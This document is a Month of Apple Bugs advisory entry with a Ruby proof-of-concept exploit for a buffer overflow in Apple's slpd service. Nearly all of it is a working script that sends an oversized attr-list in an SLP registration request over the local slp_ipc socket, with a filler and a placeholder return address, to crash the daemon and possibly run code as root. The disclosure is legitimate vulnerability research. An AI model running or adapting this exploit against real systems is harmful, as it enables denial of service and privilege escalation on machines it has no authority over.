Month of Apple Bugs - Proof of concept exploit for slpd. slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
b43cb8369fd15b26f59289ce05b054d9e9b5ee73e4ea4f070c7f378698fc6935
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.
require 'socket'
target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket = UNIXSocket.open(target_path)
payload = ("\x58" * 506)
payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398)
stream = "\x01" + # SrvRqst = 1
"\x00\x13" + # Length of remaining fields? (up to attr-list)
"\x04\x00\x00\x00\x00\x00\x00" +
"\x00\x02\x00\x00" + # length of scope-list string
"\x78\x78" + # <scope-list>
"\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex.
(payload) # <attr-list>
slp_socket.write stream
slp_socket.close